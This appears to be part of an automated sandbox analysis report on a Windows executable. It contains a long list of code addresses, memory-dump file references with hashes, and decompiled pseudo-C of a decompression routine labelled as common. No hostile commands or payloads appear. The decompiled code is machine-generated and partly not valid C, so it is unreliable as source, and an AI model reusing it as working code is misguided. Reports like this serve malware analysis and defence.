                                                                                                                              0x004063bc
                                                                                                                              0x00406394
                                                                                                                              0x00406394
                                                                                                                              0x0040639c
                                                                                                                              0x004063a1
                                                                                                                              0x004063a3
                                                                                                                              0x004063a5
                                                                                                                              0x004063a5
                                                                                                                              0x004063bf
                                                                                                                              0x004063c6
                                                                                                                              0x004063c9
                                                                                                                              0x00000000
                                                                                                                              0x004063cb
                                                                                                                              0x00000000
                                                                                                                              0x004063cb
                                                                                                                              0x00000000
                                                                                                                              0x00406658
                                                                                                                              0x00406658
                                                                                                                              0x0040665c
                                                                                                                              0x00406983
                                                                                                                              0x00000000
                                                                                                                              0x00406983
                                                                                                                              0x00406662
                                                                                                                              0x00406665
                                                                                                                              0x00406668
                                                                                                                              0x0040666c
                                                                                                                              0x0040666f
                                                                                                                              0x00406675
                                                                                                                              0x00406677
                                                                                                                              0x00406677
                                                                                                                              0x00406677
                                                                                                                              0x0040667a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406428
                                                                                                                              0x00406428
                                                                                                                              0x0040642b
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x00406767
                                                                                                                              0x0040676b
                                                                                                                              0x0040678d
                                                                                                                              0x00406790
                                                                                                                              0x0040679a
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x0040676d
                                                                                                                              0x00406770
                                                                                                                              0x00406774
                                                                                                                              0x00406777
                                                                                                                              0x00406777
                                                                                                                              0x0040677a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406824
                                                                                                                              0x00406828
                                                                                                                              0x00406846
                                                                                                                              0x00406846
                                                                                                                              0x00406846
                                                                                                                              0x0040684d
                                                                                                                              0x00406854
                                                                                                                              0x0040685b
                                                                                                                              0x0040685b
                                                                                                                              0x00000000
                                                                                                                              0x0040685b
                                                                                                                              0x0040682a
                                                                                                                              0x0040682d
                                                                                                                              0x00406830
                                                                                                                              0x00406833
                                                                                                                              0x0040683a
                                                                                                                              0x0040677e
                                                                                                                              0x0040677e
                                                                                                                              0x00406781
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406915
                                                                                                                              0x00406918
                                                                                                                              0x00406819
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040654f
                                                                                                                              0x00406551
                                                                                                                              0x00406558
                                                                                                                              0x00406559
                                                                                                                              0x0040655b
                                                                                                                              0x0040655e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406566
                                                                                                                              0x00406569
                                                                                                                              0x0040656c
                                                                                                                              0x0040656e
                                                                                                                              0x00406570
                                                                                                                              0x00406570
                                                                                                                              0x00406571
                                                                                                                              0x00406574
                                                                                                                              0x0040657b
                                                                                                                              0x0040657e
                                                                                                                              0x0040658c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406862
                                                                                                                              0x00406862
                                                                                                                              0x00406865
                                                                                                                              0x0040686c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406871
                                                                                                                              0x00406871
                                                                                                                              0x00406875
                                                                                                                              0x004069ad
                                                                                                                              0x00000000
                                                                                                                              0x004069ad
                                                                                                                              0x0040687b
                                                                                                                              0x0040687e
                                                                                                                              0x00406881
                                                                                                                              0x00406885
                                                                                                                              0x00406888
                                                                                                                              0x0040688e
                                                                                                                              0x00406890
                                                                                                                              0x00406890
                                                                                                                              0x00406890
                                                                                                                              0x00406893
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406899
                                                                                                                              0x00406899
                                                                                                                              0x0040689d
                                                                                                                              0x004068fd
                                                                                                                              0x00406900
                                                                                                                              0x00406905
                                                                                                                              0x00406906
                                                                                                                              0x00406908
                                                                                                                              0x0040690a
                                                                                                                              0x0040690d
                                                                                                                              0x00406819
                                                                                                                              0x00406819
                                                                                                                              0x00000000
                                                                                                                              0x0040681f
                                                                                                                              0x00406819
                                                                                                                              0x0040689f
                                                                                                                              0x004068a5
                                                                                                                              0x004068a8
                                                                                                                              0x004068ab
                                                                                                                              0x004068ae
                                                                                                                              0x004068b1
                                                                                                                              0x004068b4
                                                                                                                              0x004068b7
                                                                                                                              0x004068ba
                                                                                                                              0x004068bd
                                                                                                                              0x004068c0
                                                                                                                              0x004068d9
                                                                                                                              0x004068dc
                                                                                                                              0x004068df
                                                                                                                              0x004068e2
                                                                                                                              0x004068e6
                                                                                                                              0x004068e8
                                                                                                                              0x004068e8
                                                                                                                              0x004068e9
                                                                                                                              0x004068ec
                                                                                                                              0x004068c2
                                                                                                                              0x004068c2
                                                                                                                              0x004068ca
                                                                                                                              0x004068cf
                                                                                                                              0x004068d1
                                                                                                                              0x004068d4
                                                                                                                              0x004068d4
                                                                                                                              0x004068ef
                                                                                                                              0x004068f6
                                                                                                                              0x00000000
                                                                                                                              0x004068f8
                                                                                                                              0x00000000
                                                                                                                              0x004068f8
                                                                                                                              0x00000000
                                                                                                                              0x00406594
                                                                                                                              0x00406597
                                                                                                                              0x004065cd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x00406700
                                                                                                                              0x00406700
                                                                                                                              0x00406703
                                                                                                                              0x00406705
                                                                                                                              0x0040698f
                                                                                                                              0x00000000
                                                                                                                              0x0040698f
                                                                                                                              0x0040670b
                                                                                                                              0x0040670e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406714
                                                                                                                              0x00406718
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x00000000
                                                                                                                              0x0040671b
                                                                                                                              0x00406599
                                                                                                                              0x0040659b
                                                                                                                              0x0040659d
                                                                                                                              0x0040659f
                                                                                                                              0x004065a2
                                                                                                                              0x004065a3
                                                                                                                              0x004065a5
                                                                                                                              0x004065a7
                                                                                                                              0x004065aa
                                                                                                                              0x004065ad
                                                                                                                              0x004065c3
                                                                                                                              0x004065c8
                                                                                                                              0x00406600
                                                                                                                              0x00406600
                                                                                                                              0x00406604
                                                                                                                              0x00406630
                                                                                                                              0x00406632
                                                                                                                              0x00406639
                                                                                                                              0x0040663c
                                                                                                                              0x0040663f
                                                                                                                              0x0040663f
                                                                                                                              0x00406644
                                                                                                                              0x00406644
                                                                                                                              0x00406646
                                                                                                                              0x00406649
                                                                                                                              0x00406650
                                                                                                                              0x00406653
                                                                                                                              0x00406680
                                                                                                                              0x00406680
                                                                                                                              0x00406683
                                                                                                                              0x00406686
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x00000000
                                                                                                                              0x004066fa
                                                                                                                              0x00406688
                                                                                                                              0x0040668e
                                                                                                                              0x00406691
                                                                                                                              0x00406694
                                                                                                                              0x00406697
                                                                                                                              0x0040669a
                                                                                                                              0x0040669d
                                                                                                                              0x004066a0
                                                                                                                              0x004066a3
                                                                                                                              0x004066a6
                                                                                                                              0x004066a9
                                                                                                                              0x004066c2
                                                                                                                              0x004066c4
                                                                                                                              0x004066c7
                                                                                                                              0x004066c8
                                                                                                                              0x004066cb
                                                                                                                              0x004066cd
                                                                                                                              0x004066d0
                                                                                                                              0x004066d2
                                                                                                                              0x004066d4
                                                                                                                              0x004066d7
                                                                                                                              0x004066d9
                                                                                                                              0x004066dc
                                                                                                                              0x004066e0
                                                                                                                              0x004066e2
                                                                                                                              0x004066e2
                                                                                                                              0x004066e3
                                                                                                                              0x004066e6
                                                                                                                              0x004066e9
                                                                                                                              0x004066ab
                                                                                                                              0x004066ab
                                                                                                                              0x004066b3
                                                                                                                              0x004066b8
                                                                                                                              0x004066ba
                                                                                                                              0x004066bd
                                                                                                                              0x004066bd
                                                                                                                              0x004066ec
                                                                                                                              0x004066f3
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x004066f3
                                                                                                                              0x00406606
                                                                                                                              0x00406609
                                                                                                                              0x0040660b
                                                                                                                              0x0040660e
                                                                                                                              0x00406611
                                                                                                                              0x00406614
                                                                                                                              0x00406616
                                                                                                                              0x00406619
                                                                                                                              0x0040661c
                                                                                                                              0x0040661c
                                                                                                                              0x0040661f
                                                                                                                              0x0040661f
                                                                                                                              0x00406622
                                                                                                                              0x00406629
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00406629
                                                                                                                              0x004065af
                                                                                                                              0x004065b2
                                                                                                                              0x004065b4
                                                                                                                              0x004065b7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406316
                                                                                                                              0x00406316
                                                                                                                              0x0040631a
                                                                                                                              0x0040695f
                                                                                                                              0x00000000
                                                                                                                              0x0040695f
                                                                                                                              0x00406320
                                                                                                                              0x00406323
                                                                                                                              0x00406326
                                                                                                                              0x00406329
                                                                                                                              0x0040632c
                                                                                                                              0x0040632f
                                                                                                                              0x00406332
                                                                                                                              0x00406334
                                                                                                                              0x00406337
                                                                                                                              0x0040633a
                                                                                                                              0x0040633d
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004064a1
                                                                                                                              0x004064a1
                                                                                                                              0x004064a5
                                                                                                                              0x0040696b
                                                                                                                              0x00000000
                                                                                                                              0x0040696b
                                                                                                                              0x004064ab
                                                                                                                              0x004064ae
                                                                                                                              0x004064b1
                                                                                                                              0x004064b4
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b9
                                                                                                                              0x004064bc
                                                                                                                              0x004064bf
                                                                                                                              0x004064c2
                                                                                                                              0x004064c5
                                                                                                                              0x004064c8
                                                                                                                              0x004064c9
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064ce
                                                                                                                              0x004064d1
                                                                                                                              0x004064d4
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064da
                                                                                                                              0x004064dc
                                                                                                                              0x004064dc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x00406722
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406728
                                                                                                                              0x0040672b
                                                                                                                              0x0040672e
                                                                                                                              0x00406731
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406736
                                                                                                                              0x00406739
                                                                                                                              0x0040673c
                                                                                                                              0x0040673f
                                                                                                                              0x00406742
                                                                                                                              0x00406745
                                                                                                                              0x00406746
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x0040674b
                                                                                                                              0x0040674e
                                                                                                                              0x00406751
                                                                                                                              0x00406754
                                                                                                                              0x00406757
                                                                                                                              0x0040675b
                                                                                                                              0x0040675d
                                                                                                                              0x00406760
                                                                                                                              0x00000000
                                                                                                                              0x00406762
                                                                                                                              0x004064df
                                                                                                                              0x004064df
                                                                                                                              0x00000000
                                                                                                                              0x004064df
                                                                                                                              0x00406760
                                                                                                                              0x00406995
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fc4
                                                                                                                              0x004069cc
                                                                                                                              0x004069cc
                                                                                                                              0x00000000
                                                                                                                              0x004069cc
                                                                                                                              0x00406819
                                                                                                                              0x004067a0
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x004063d4

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                                              • Instruction ID: 235c9a1f152390887c8e3346b3cf8cf745e7d176c25095dba4735a56a8f4339d
                                                                                                                              • Opcode Fuzzy Hash: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                                              • Instruction Fuzzy Hash: 80714371D00229CBDF28CFA8C8447ADBBF1FB48305F15806AD846BB281D7395A96DF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004064EE, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 98%
                                                                                                                              			E004064EE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
